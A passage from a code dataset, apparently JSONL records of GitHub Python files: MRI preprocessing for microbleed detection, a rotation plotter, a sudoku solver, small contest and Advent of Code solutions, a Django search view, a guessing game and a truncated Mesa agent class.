+{"seq_id":"73828439206","text":"# -*- coding: utf-8 -*-\n# +\n# 简介:\n# 有些预处理环节比耗时,所以采用该代码实现离线预处理,这些预处理包括:\n\n# 删除多余timepoint(实际上数据集人工梳理之后,不存在在多个timepoint的nii.gz文件了)\n# 原始nii.gz文件中黑框较多,事先除去用本代码去除黑框。\n# LPS方向调整\n# 对病灶进行dilation\n\n# +\nimport random\nimport numpy as np\nimport cupy as cp\nimport h5py\nfrom glob import glob\nfrom tqdm import tqdm\nimport SimpleITK as sitk\n# 必须在导入torch之前先导入SimpleITK,顺序不能颠倒,否则内核挂掉。\nimport torch\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transforms\n\nimport os\n# os.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"TRUE\"\n# -\nclass WRZ_MaskRCNN_Dataset_Processor(Dataset):\n \"\"\"\n WRZ项目MaskRCNN的数据集预处理类.\n 读取nii.gz格式的MRI图像和mask标注,处理后另存为指定格式.\n 1种模式:\n 用户指定数据集的样本文件路径名列表.\n \"\"\"\n def __init__(\n self,\n lower_bound=5,\n outspacing=None,#(0.5,0.5,1.5)\n ):\n \"\"\"\n \"\"\"\n self.lower_bound = lower_bound\n self.outspacing = outspacing\n \n\n def __call__(self, filepath_img, filepath_mask):\n # 读图\n img_sitk = sitk.ReadImage(filepath_img)\n mask_sitk = sitk.ReadImage(filepath_mask)\n \n # delete nuisance channel\n if img_sitk.GetDimension()==4:\n img_sitk = img_sitk[:,:,:,0]# 对于多个timepoint的MRI,仅对第一个timepoint做病灶标注\n \n # orient\n img_sitk = sitk.DICOMOrient(img_sitk,desiredCoordinateOrientation='LPS')\n mask_sitk = sitk.DICOMOrient(mask_sitk,desiredCoordinateOrientation='LPS')\n \n # crop outer frame\n img_sitk, bbox = SITKCropOuterFrame( self.lower_bound )(img_sitk)\n mask_sitk = mask_sitk[bbox[0]:bbox[1],bbox[2]:bbox[3],bbox[4]:bbox[5]]\n \n # dilation\n mask_sitk = sitk.DilateObjectMorphology(mask_sitk, kernelRadius=(5, 5, 0), kernelType=sitk.sitkBall)\n \n # resample\n if self.outspacing:\n img_sitk = resampleimg_sitk(outspacing=self.outspacing, img_sitk=img_sitk, method=sitk.sitkLinear)\n mask_sitk = resampleimg_sitk(outspacing=self.outspacing, img_sitk=mask_sitk, method=sitk.sitkNearestNeighbor)\n \n return img_sitk, mask_sitk\n\n\n\ndef resampleimg_sitk(outspacing, img_sitk, method=sitk.sitkLinear):\n \"\"\"\n 将体数据重采样到指定的spacing大小\\n\n paras:\n outpacing:指定的spacing,例如[1,1,1]\n img_sitk:sitk读取的image信息,这里是体数据\\n\n return:重采样后的数据\n \"\"\"\n outsize = [0, 0, 0]\n # 读取文件的size和spacing信息\n inputsize = img_sitk.GetSize()\n inputspacing = img_sitk.GetSpacing()\n \n transform = sitk.Transform()\n transform.SetIdentity()\n # 计算改变spacing后的size,用物理尺寸/体素的大小\n outsize[0] = round(inputsize[0] * inputspacing[0] / outspacing[0])\n outsize[1] = round(inputsize[1] * inputspacing[1] / outspacing[1])\n outsize[2] = round(inputsize[2] * inputspacing[2] / outspacing[2])\n \n # 设定重采样的一些参数\n resampler = sitk.ResampleImageFilter()\n resampler.SetTransform(transform)\n resampler.SetInterpolator(method)\n resampler.SetOutputOrigin(img_sitk.GetOrigin())\n resampler.SetOutputSpacing(outspacing)\n resampler.SetOutputDirection(img_sitk.GetDirection())\n resampler.SetSize(outsize)\n newimg_sitk = resampler.Execute(img_sitk)\n return newimg_sitk\n\n\nclass SITKResample(object):\n \"\"\"\n 将SimpleITK图像重采样到指定的spacing\n \"\"\"\n def __init__(self,target_spacing):\n super().__init__()\n self.target_spacing = target_spacing\n \n def __call__(self,img_sitk):\n target_spacing = list(self.target_spacing)\n if (self.target_spacing[2] == -1):\n target_spacing[2] = max(1.0,img_sitk.GetSpacing()[2]) \n return resampleimg_sitk(target_spacing, img_sitk)\n\n\nclass SITKRandomResample(object):\n \"\"\"\n 将SimpleITK图像重采样到指定的spacing\n \"\"\"\n def __init__(self,target_spacing_lower,target_spacing_upper):\n super().__init__()\n self.target_spacing_lower = target_spacing_lower\n self.target_spacing_upper = target_spacing_upper\n \n def __call__(self,img_sitk):\n if (self.target_spacing_lower[2] == -1) and (self.target_spacing_lower[2] == -1):\n target_spacing = ( \n np.round( np.random.uniform(self.target_spacing_lower[0],self.target_spacing_upper[0]), 2),\n np.round( np.random.uniform(self.target_spacing_lower[1],self.target_spacing_upper[1]), 2),\n max(1.0,img_sitk.GetSpacing()[2]),\n )\n else:\n target_spacing = ( \n np.round( np.random.uniform(self.target_spacing_lower[0],self.target_spacing_upper[0]), 2),\n np.round( np.random.uniform(self.target_spacing_lower[1],self.target_spacing_upper[1]), 2),\n np.round( np.random.uniform(self.target_spacing_lower[2],self.target_spacing_upper[2]), 2),\n )\n return resampleimg_sitk(target_spacing, img_sitk)\n\n\n# +\nclass SITKDICOMOrient(object):\n \"\"\"\n SipleITK.Normalize\n \"\"\"\n def __init__(self,desiredCoordinateOrientation='LPS'):\n super().__init__()\n self.desiredCoordinateOrientation = desiredCoordinateOrientation\n \n def __call__(self,img_sitk):\n return sitk.DICOMOrient(img_sitk,self.desiredCoordinateOrientation)\n \n \nclass SITKNormalize(object):\n \"\"\"\n SipleITK.Normalize\n \"\"\"\n def __init__(self):\n super().__init__()\n \n def __call__(self,img_sitk):\n return sitk.Normalize(img_sitk)\n\n\n# -\n\nclass SITKCropOuterFrame(object):\n \"\"\"\n 裁剪掉外部的黑框\n refenrence: https://simpleitk.readthedocs.io/en/v1.2.4/Examples/ImageGridManipulation/Documentation.html?highlight=crop#code\n \"\"\"\n def __init__(self,lower_bound=0):\n super().__init__()\n self.lower_bound = lower_bound\n \n def __call__(self,img_sitk):\n tmp_arr = sitk.GetArrayFromImage( img_sitk ).transpose((2,1,0))\n tmp_arr = tmp_arr[::3,::3,::2]\n idx = np.where(tmp_arr>self.lower_bound)\n# idx = cp.where(cp.array(tmp_arr)>self.lower_bound)\n idx0_min = int(idx[0].min()*3)\n idx0_max = int(idx[0].max()*3+1)\n idx1_min = int(idx[1].min()*3)\n idx1_max = int(idx[1].max()*3+1)\n idx2_min = int(idx[2].min()*2)\n idx2_max = int(idx[2].max()*2+1)\n bbox = (idx0_min, idx0_max, idx1_min, idx1_max, idx2_min, idx2_max)\n img_sitk = img_sitk[\n bbox[0]:bbox[1],\n bbox[2]:bbox[3],\n bbox[4]:bbox[5]]\n \n return img_sitk,bbox\n\n\nclass SITKRandomCrop(object):\n \"\"\"\n 裁剪掉外部的黑框\n refenrence: https://simpleitk.readthedocs.io/en/v1.2.4/Examples/ImageGridManipulation/Documentation.html?highlight=crop#code\n \"\"\"\n def __init__(self,size_lower=0.0,size_upper=1.0):\n super().__init__()\n self.size_lower = size_lower\n self.size_upper = size_upper\n \n def __call__(self,img_sitk):\n size = img_sitk.GetSize()\n # 最小最大尺寸\n min_size, max_size = np.ceil(self.size_lower*np.array(size)), np.floor(self.size_upper*np.array(size))\n # 实际切割出来的尺寸\n crop_size = [random.randint(a,b) for a,b in zip(min_size,max_size)]\n # 实际切割起始位置\n start_loc = [random.randint(0,b-a) for a,b in zip(crop_size,size)]\n # 切割\n img_sitk = img_sitk[\n start_loc[0]:start_loc[0]+crop_size[0], \n start_loc[1]:start_loc[1]+crop_size[1], \n start_loc[2]:start_loc[2]+crop_size[2]]\n\n return img_sitk\n\n\nclass SITKAdaptiveHistEqual(object):\n \"\"\"\n 自适应直方图均衡.\n refenrence: https://blog.csdn.net/qq_39071739/article/details/107492462\n \"\"\"\n def __init__(self,alpha=0.9,beta=0.9,radius=3):\n super().__init__()\n self.alpha = alpha\n self.beta = beta\n self.radius = radius\n \n def __call__(self,img_sitk):\n # 4.Histogram equalization\n sitk_hisequal = sitk.AdaptiveHistogramEqualizationImageFilter()\n sitk_hisequal.SetAlpha(self.alpha)\n sitk_hisequal.SetBeta(self.beta)\n sitk_hisequal.SetRadius(self.radius)\n sitk_hisequal = sitk_hisequal.Execute(img_sitk)\n return sitk_hisequal\n\n\n# +\nif __name__ == \"__main__\":\n \"\"\"\n # 旧版数据集\n # ZSSY数据集\n params = {\n 'pat_img': '/raid/huaqing/tyler/WRZ/data/internal_center_data/ZSSY_before_ROI/*/*SWS.nii.gz',\n 'pat_mask': '/raid/huaqing/tyler/WRZ/data/internal_center_data/ZSSY_before_ROI/*/*SWS_ROI.nii.gz',\n 'save_dir': '/raid/huaqing/tyler/WRZ/data/internal_center_data/ZSSY_before_ROI_processed',\n 'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n }\n # MMSY数据集\n params = {\n 'pat_img': '/raid/huaqing/tyler/WRZ/data/external_center_data/MMSY_before_ROI/*/*SWS.nii.gz',\n 'pat_mask': '/raid/huaqing/tyler/WRZ/data/external_center_data/MMSY_before_ROI/*/*SWS_ROI.nii.gz',\n 'save_dir': '/raid/huaqing/tyler/WRZ/data/external_center_data/MMSY_before_ROI_processed',\n 'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n }\n\n # SDFY数据集\n params = {\n 'pat_img': '/raid/huaqing/tyler/MedAI/WRZ/data/external_center_data/SDFY_before_ROI/*/*SWS.nii.gz',\n 'pat_mask': '/raid/huaqing/tyler/MedAI/WRZ/data/external_center_data/SDFY_before_ROI/*/*SWS_ROI.nii.gz',\n 'save_dir': '/raid/huaqing/tyler/MedAI/WRZ/data/external_center_data/SDFY_before_ROI_processed',\n 'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n }\n \"\"\"\n \n# # 新版数据集\n# # ZSSY数据集\n# params = {\n# 'pat_img': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/ZSSY/*/*SWS.nii.gz',\n# 'pat_mask': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/ZSSY/*/*SWS_ROI.nii.gz',\n# 'save_dir': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/ZSSY_processed',\n# 'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n# #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n# }\n \n# # MMSY数据集\n# params = {\n# 'pat_img': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/MMSY/*/*SWS.nii.gz',\n# 'pat_mask': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/MMSY/*/*SWS_ROI.nii.gz',\n# 'save_dir': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/MMSY_processed',\n# 'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n# #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n# }\n \n # SDFY数据集\n params = {\n 'pat_img': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/SDFY/*/*SWS.nii.gz',\n 'pat_mask': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/SDFY/*/*SWS_ROI.nii.gz',\n 'save_dir': '/local_data_ssd/huaqing/tyler/MedAI/WRZ/data/AI_Final_Data/SDFY_processed',\n 'clses_name': {\"ACSVD\":0, \"CADASIL\":1, \"CAA\":2},\n #'outspacing': [0.3,0.3,1.0],#[0.5,0.5,1.5],\n }\n\n \n \n filepath_list_img = glob(params['pat_img'])\n filepath_list_mask = [filepath.replace('SWS.nii.gz','SWS_ROI.nii.gz') for filepath in filepath_list_img]\n \n preprocessor = WRZ_MaskRCNN_Dataset_Processor(lower_bound=5)\n\n for filepath_img,filepath_mask in tqdm(zip(filepath_list_img,filepath_list_mask)):\n img_sitk, mask_sitk = preprocessor(filepath_img,filepath_mask)\n # 保存处理后的图像\n save_path = os.path.join(params['save_dir'],filepath_img.split(os.path.sep)[-2])\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n save_filepath_img = os.path.join(save_path,filepath_img.split(os.path.sep)[-1])\n sitk.WriteImage( img_sitk,save_filepath_img )\n # 保存处理后的mask\n save_filepath_mask = os.path.join(save_path,filepath_mask.split(os.path.sep)[-1])\n sitk.WriteImage( mask_sitk,save_filepath_mask )\n# -\n\n\n","repo_name":"Huatsing-Lau/CSVD-CMBs-Detection-and-Classification","sub_path":"datasets/.ipynb_checkpoints/WRZ_DataSet_Process-checkpoint.py","file_name":"WRZ_DataSet_Process-checkpoint.py","file_ext":"py","file_size_in_byte":12463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"677889269","text":"import sys\nimport getopt\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\n\nstyle.use('seaborn')\n\nprev_file_mod_time = 0\nfile_time_counter = 0\n\n\ndef main(argv):\n avg_rot = False\n rot = False\n x = False\n y = False\n z = False\n window_seconds = 5\n\n colors = ['red', 'blue', 'green', 'orange', 'black', 'purple', 'cyan', 'grey', 'violet', 'gold',\n 'indigo', 'brown', 'pink', 'magenta', 'tan', 'darkgreen', 'turquoise',\n 'darkblue', 'beige', 'olive', 'hotpink', 'darkred', 'darkgrey', 'crimson',\n 'coral', 'lavender', 'salmon', 'eggplant']\n\n try:\n opts, args = getopt.getopt(argv, \"harxyzw:\", [\"avg\", \"rot\", \"X\", \"Y\", \"Z\", \"window_size\"])\n except getopt.GetoptError:\n print(\"rotation_plot.py -a -x -y -z -w [--avg --X --Y --Z --window_size]\")\n sys.exit(2)\n\n for opt, arg in opts:\n if opt == '-h':\n print(\"rotation_plot.py -a -x -y -z -w [--avg --X --Y --Z --window_size]\")\n sys.exit()\n elif opt in (\"-a\", \"--avg\"):\n avg_rot = True\n elif opt in (\"-r\", \"--rot\"):\n rot = True\n elif opt in (\"-x\", \"--X\"):\n x = True\n elif opt in (\"-y\", \"--Y\"):\n y = True\n elif opt in (\"-z\", \"--Z\"):\n z = True\n elif opt in (\"-w\", \"--window_size\"):\n window_seconds = int(arg)\n\n if not (x or y or z):\n print(\"Error: Specfiy atleast one rotation axis (x/y/z) to plot.\\n\"\n \"Use flags [-x | --X] and/or [-y | --Y] and/or [-z | --Z]\")\n sys.exit()\n\n file_names = list()\n window_size = list()\n time_step = list()\n\n if not (rot or avg_rot):\n print(\"Error: Specfiy atleast one rotation stat. to plot.\\n\"\n \"Use flags [-r | --rot] and/or [-a | --avg_rot]\")\n sys.exit()\n\n if rot:\n file_names.append('/home/nash/DeepMimic/output/part_rot.dat')\n window_size.append(30 * 20 * window_seconds)\n time_step.append(0.033332/20)\n\n if avg_rot:\n file_names.append('/home/nash/DeepMimic/output/avg_part_rot.dat')\n window_size.append(30 * window_seconds)\n time_step.append(0.033332)\n\n graph_data = open(file_names[0], 'r').read()\n lns = graph_data.split('\\n')\n data_dim = len(lns[1].split(' '))\n\n num_plots = int(data_dim/3)\n\n fig, axs = plt.subplots(num_plots, sharey=True, sharex=True)\n fig.suptitle('Part Rotation Plot', fontsize=20)\n\n def plot_axs(sub_plot):\n return axs[sub_plot] if num_plots > 1 else axs\n\n def extract_plot_data(file, win_size, ts, check_file_update=False):\n global prev_file_mod_time\n global file_time_counter\n\n if check_file_update:\n file_mod_time = os.stat(file)[8]\n if file_mod_time == prev_file_mod_time:\n file_time_counter += 1\n else:\n file_time_counter = 0\n prev_file_mod_time = file_mod_time\n\n if file_time_counter > 10:\n return [], []\n\n graph_data = open(file, 'r').read()\n lines = graph_data.split('\\n')\n t = list()\n\n plot_data = np.empty((num_plots, win_size, 3))\n for i, line in enumerate(lines[-win_size:]):\n if len(line) > 1 and not line[0] == '#':\n data_point = line.split(' ')\n plot_data[:, i, :] = np.array([float(dp) for dp in data_point]).reshape(-1, 3)\n t.append(float(i) * ts)\n\n return plot_data, t\n\n def animate(i):\n plot_data = list()\n time_data = list()\n for i, (fn, ws, ts) in enumerate(zip(file_names, window_size, time_step)):\n data, time = extract_plot_data(fn, ws, ts, check_file_update=(i == 0))\n if len(data) > 0:\n plot_data.append(data)\n time_data.append(time)\n else:\n return\n\n if num_plots > 1:\n for ax in axs:\n ax.clear()\n else:\n axs.clear()\n\n for n, (data, t, ws) in enumerate(zip(plot_data, time_data, window_size)):\n for i in range(num_plots):\n ind = (n * num_plots) + i\n if x:\n plot_axs(i).plot(t[-ws:], data[i, :len(t), 0].tolist(), color=colors[ind],\n label=(('Joint-' + str(i+1)) if n == 0 else None))\n if y:\n plot_axs(i).plot(t[-ws:], data[i, :len(t), 1].tolist(), color=colors[ind],\n label=(('Joint-' + str(i+1)) if n == 0 else None))\n if z:\n plot_axs(i).plot(t[-ws:], data[i, :len(t), 2].tolist(), color=colors[ind],\n label=(('Joint-' + str(i+1)) if n == 0 else None))\n\n if i == np.ceil(num_plots/2):\n plot_axs(i).set(ylabel='Rotation (rad.)')\n\n plot_axs(i).legend(loc='upper right')\n plot_axs(num_plots-1).set(xlabel='Time(s)')\n\n _ = animation.FuncAnimation(fig, animate, interval=100)\n plt.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"nash911/Learning_Analyser","sub_path":"rotation_plot.py","file_name":"rotation_plot.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36106192644","text":"rows = 'ABCDEFGHI'\ncols = '123456789'\n\ndef cross(a, b):\n return [s+t for s in a for t in b]\n\nboxes = cross(rows, cols)\n\nrow_units = [cross(r, cols) for r in rows]\ncolumn_units = [cross(rows, c) for c in cols]\nsquare_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]\nunitlist = row_units + column_units + square_units\nunits = dict((s, [u for u in unitlist if s in u]) for s in boxes)\npeers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)\n\n\ndef display(values):\n \"\"\"\n Display the values as a 2-D grid.\n Input: The sudoku in dictionary form\n Output: None\n \"\"\"\n width = 1+max(len(values[s]) for s in boxes)\n line = '+'.join(['-'*(width*3)]*3)\n for r in rows:\n print(''.join(values[r+c].center(width)+('|' if c in '36' else '')\n for c in cols))\n if r in 'CF': print(line)\n return\n\ndef grid_values(grid):\n \"\"\"\n Combine boxes and grid into a dict with label and value pairs\n Replace empty values with all possible values\n \"\"\"\n values = []\n all_digits = '123456789'\n for c in grid:\n if c == '.':\n values.append(all_digits)\n elif c in all_digits:\n values.append(c)\n assert len(values) == 81\n return dict(zip(boxes, grid))\n\ndef eliminate(values):\n \"\"\"\n Eliminate values from peers of each box with a single value.\n Returns Sudoku in dictionary form after eliminating values.\n \"\"\"\n solved_values = [box for box in values.keys() if len(values[box]) == 1]\n for box in solved_values:\n digit = values[box]\n for peer in peers[box]:\n values[peer] = values[peer].replace(digit, '')\n return values\n\ndef only_choice(values):\n \"\"\"\n Go through all the units, and whenever there is a unit with a value\n that only fits in one box, assign the value to this box.\n \"\"\"\n for unit in unitlist:\n for d in '123456789':\n dplaces = [box for box in unit if d in values[box]]\n if len(dplaces) == 1:\n values[dplaces[0]] = d\n return values\n\ndef reduce_puzzle(values):\n stalled = False\n while not stalled:\n # Check how many boxes have a determined value\n solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])\n\n # Apply Eliminate Strategy\n values = eliminate(values)\n # Apply Only Choice Strategy\n values = only_choice(values)\n\n # Check how many boxes have a determined value, to compare\n solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])\n # If no new values were added, stop the loop.\n stalled = solved_values_before == solved_values_after\n # Sanity check, return False if there is a box with zero available values:\n if len([box for box in values.keys() if len(values[box]) == 0]):\n return False\n return values\n\ndef search(values):\n \"Using depth-first search and propagation, create a search tree and solve the sudoku.\"\n # First, reduce the puzzle until stalls\n values = reduce_puzzle(values)\n if values is False:\n return False\n if all(len(values[s]) == 1 for s in boxes):\n return values # SOLVED!!\n # Choose one of the unfilled squares with the fewest possibilities\n n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)\n # Use recursion to solve each one of the resulting sudokus, and if one returns a value (not False), return that answer!\n for value in values[s]:\n new_values = values.copy()\n new_values[s] = value\n attempt = search(new_values)\n if attempt:\n return attempt\n","repo_name":"danielpowell4/sudoku-solver","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27612851202","text":"# https://open.kattis.com/contests/knzvpe\n# Time: 2022-09-21 12:51:19\n# title: EtCPC2022 - Practice - 10 / Divisor Shuffle\n# language: Python 3\n\n\nn = int(input())\na = [int(i) for i in input().split()]\na.sort(reverse=True)\nx = a[0]\nfor i in range(n-1):\n if x%a[i] != 0:\n y = a[i]\n break\n else:\n if a[i] == a[i+1]:\n y = a[i]\n break\nprint(y, x)\n ","repo_name":"mukerem/competitive-programming","sub_path":"kattis/divisorshuffle.py","file_name":"divisorshuffle.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27444104902","text":"from django.shortcuts import render\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom comics.models import Comic\n\n\ndef do_search(request):\n \"\"\"\n A view to search for comics. For results\n paginate for more than 4 items per page.\n Search by name, grade and brand - publisher\n on customer facing side\n \"\"\"\n comics_list = Comic.objects.all()\n query = request.GET.get('q')\n if query:\n comics_list = Comic.objects.filter(\n Q(name__icontains=query) | Q(grade__icontains=query) |\n Q(brand__icontains=query)\n ).distinct()\n paginator = Paginator(comics_list, 4)\n\n page = request.GET.get('page')\n try:\n comics = paginator.page(page)\n except PageNotAnInteger:\n\n comics = paginator.page(1)\n except EmptyPage:\n\n comics = paginator.page(paginator.num_pages)\n return render(request, \"search.html\", {\"comics\": comics})\n","repo_name":"adonegan/milestone4-mycomicjumble","sub_path":"search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28251411647","text":"from collections import defaultdict\nimport string\nimport re\n\ninput = open('input.txt').readlines()\ninput_list = []\nfor line in input:\n a, b = re.findall(r' ([A-Z]) ', line)\n input_list.append((a, b))\n\n\ndef part_1(rules):\n tasks, deps = get_tasks_and_deps(rules)\n done = []\n for _ in tasks:\n done.append(\n min(x for x in tasks if x not in done and deps[x] <= set(done)))\n return ''.join(done)\n\n\ndef part_2(rules):\n tasks, deps = get_tasks_and_deps(rules)\n done = set()\n seconds = 0\n counts = [0] * 5\n work = [''] * 5\n while True:\n for i, count in enumerate(counts):\n if count == 1:\n done.add(work[i])\n counts[i] = max(0, count - 1)\n while 0 in counts:\n i = counts.index(0)\n candidates = [x for x in tasks if deps[x] <= done]\n if not candidates:\n break\n task = min(candidates)\n tasks.remove(task)\n counts[i] = ord(task) - ord('A') + 61\n work[i] = task\n if sum(counts) == 0:\n break\n seconds += 1\n return seconds\n\n\ndef get_tasks_and_deps(rules):\n tasks = set()\n deps = defaultdict(set)\n for rule in rules:\n a, b = rule\n tasks |= {a, b}\n deps[b].add(a)\n return tasks, deps\n\n\nprint(part_1(input_list))\nprint(part_2(input_list))\n","repo_name":"jcockbain/advent-of-code-17-19","sub_path":"2018/7/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26062125557","text":"#This is a guess the number game.\n\nimport random\n\nguessesTaken = 0\n\nprint('This is a number guessing game. What is your name?')\nmyName = input()\n\nnumber = random.randint(1,50)\nprint('Welcome, ' + myName +', a random number has been selected between 1 and 100.')\n\nwhile guessesTaken < 4:\n print('Take a guess.')\n guess = input()\n guess = int(guess)\n \n guessesTaken = guessesTaken + 1\n \n if guess < number:\n print('Your guess is too low,' + myName +', please try again.')\n \n if guess > number:\n print('No,' + myName +', you are guessing too high.')\n \n if guess == number:\n break\n \nif guess == number:\n guessesTaken = str(guessesTaken)\n print('Good job! You guessed the number in ' + guessesTaken + 'guesses')\n \nif guess != number:\n number = str(number)\n print('Close but no cigar, I was thinking of ' + number) \n ","repo_name":"lucas-sqz-binswanger/Number_Guessing_Game","sub_path":"numberguessingame.py","file_name":"numberguessingame.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4588242916","text":"\"\"\"\nA custom Agent class for a Mesa simulation.\n\"\"\"\n\nfrom mesa import Agent, Model\nfrom .make_python_identifier import make_python_identifier as mpi\nfrom collections import Iterable, namedtuple\nfrom dataclasses import dataclass, field\nfrom typing import Any, List, Dict, Callable\nimport copy\nimport dill\nimport json\n# ---- CUSTOM IMPORTS ----\n# (many may be extraneous)\nimport random\nimport statistics\n\nrule_file = 'MigrationRules.json' # This could probably be done better?\n\n# GroupQry = namedtuple('GroupQry', 'attr rel cond full', defaults=[{}, {}, [], False])\n\n\n@dataclass\nclass GroupQry:\n attr: Dict[str, Any] = field(default_factory=dict)\n # check type of values here\n rel: Dict[str, str] = field(default_factory=dict)\n cond: List[Callable[[Agent], bool]] = field(default_factory=list)\n full: bool = False\n\n def __post_init__(self):\n # ensure attributes and relations are valid variable names\n self.attr = {mpi(k): v for k, v in self.attr.items()}\n self.rel = {mpi(k): v for k, v in self.rel.items()}\n\n\nclass MigrationAgent(Agent):\n\n _protected = ('model', 'random', 'source_name', 'unique_id', '_attr', '_rel', 'pos', 'set_dict', 'del_set',\n 'ConflictRule', 'MigrationRule') # TODO: should pos actually be in here\n\n # def __init__(self, unique_id, model):\n def __init__(self, unique_id, model, attr, rel):\n # Mesa generally holds Agent data (including locations) as attributes, not dictionary entries.\n # as such, we only store names of attributes and relations in different sets for compatibility with some\n # specific PRAM functions like get_attrs and get_rels. If needed, attribute values are retrieved lazily\n self._attr = set()\n self._rel = set()\n self.set_dict = {}\n self.del_set = set()\n super().__init__(unique_id, model)\n # making identifiers should be handled in translation now\n # self.namespace = {} # for make_python_identifier\n for key, value in attr.items():\n # id, self.namespace = mpi(key, namespace=self.namespace, reserved_words=[])\n # setattr(self, id, value)\n # self._attr.add(id)\n setattr(self, key, value)\n # self._attr.add(key)\n for key, value in rel.items():\n s = self.model.site_hashes[value]\n if key == '@':\n self.model.grid.place_agent(self, s)\n self._rel.add('pos')\n else:\n setattr(self, key, s)\n # else:\n # # id, self.namespace = mpi(key, namespace=self.namespace, reserved_words=['agent', 'weight'])\n # # setattr(self, id, s)\n # # self._rel.add(id)\n # setattr(self, key, s)\n # self._rel.add(key)\n # make (callable) instances of each of our rules\n self.ConflictRule = ConflictRule(self)\n self.MigrationRule = MigrationRule(self)\n\n # we customize __setattr__ in order to:\n # - keep track of attributes vs relations, mostly for pram compatibility.\n # - prevent some awkward constructs when trying to set position (i.e., `if xyz == '@'...`)\n # - transparently use make_python_identifier to ensure safe variable names\n def __setattr__(self, name, value):\n # don't treat special variables any different\n if name in MigrationAgent._protected:\n object.__setattr__(self, name, value)\n return\n\n name = mpi(name)\n\n if value in self.model.grid.G.nodes:\n # if value in self.model.site_hashes | self.model.grid.G.nodes:\n # try:\n # value = self.model.site_hashes[value]\n # except KeyError:\n # pass\n if name == '_at_sign':\n self.model.grid.move_agent(self, value)\n # self._rel.add('pos')\n else:\n object.__setattr__(self, name, value)\n self._rel.add(name)\n return\n\n object.__setattr__(self, name, value)\n self._attr.add(name)\n\n # we also customize __getattr__ to use make_python_identifier where needed and for position lookups\n # we do not use __getattribute__; we only want to change behavior for non-safe/non-found attributes, and '@' (pos)\n def __getattr__(self, name):\n mod_name = mpi(name)\n # if name == mod_name:\n # raise AttributeError(f\"'{type(self).__name__}' object has no attribute '{mod_name}'\")\n if mod_name == '_at_sign':\n return self.pos\n\n # all we do to fix broken lookups is look for positional calls and unsafe names.\n # if calling mpi fixes a name, this sends it back to __getattribute__ and we continue as normal.\n # if not, it will get caught by the first if clause above (this may be an inefficient way to do this)\n # return getattr(self, mod_name)\n return object.__getattribute__(self, mod_name)\n\n # we similarly customize __delattr__ to use make_python_identifier and to remove agents from the grid\n def __delattr__(self, name):\n try:\n object.__delattr__(self, name)\n except AttributeError:\n name = mpi(name)\n if name == 'at_sign':\n self.grid._remove_agent(self, self.pos)\n object.__delattr__(self, 'pos')\n else:\n object.__delattr__(self, name)\n\n # purge from _attr or _rel (we just blindly guess until we either get it or don't)\n try:\n self._attr.remove(name)\n except KeyError:\n try:\n self._rel.remove(name)\n except KeyError:\n pass\n\n # models use SimultaneousActivation.\n # The step function calls all of the rules, which will stage attribute changes.\n # The advance function makes those changes.\n def step(self):\n self.ConflictRule()\n self.MigrationRule()\n\n def advance(self):\n for key, value in self.set_dict.items():\n setattr(self, key, value)\n self.set_dict.clear()\n\n while self.del_set:\n delattr(self, self.del_set.pop())\n\n def set(self, key, value):\n \"\"\"\n Use this function instead of directly setting an attribute in a rule.\n \"\"\"\n self.set_dict[key] = value\n\n def get(self, key, default=None):\n \"\"\"\n Alias for getattr(self, key, default).\n (Note however that this will return None instead of throw an AttributeError)\n \"\"\"\n return getattr(self, key, default)\n\n def delete(self, key):\n \"\"\"\n Use this function instead of directly deleting an attribute in a rule.\n \"\"\"\n self.del_set.add(key)\n\n def has_attr(self, qry):\n \"\"\"\n Determines if this agent matches a specified query of attributes.\n :param qry: A string, 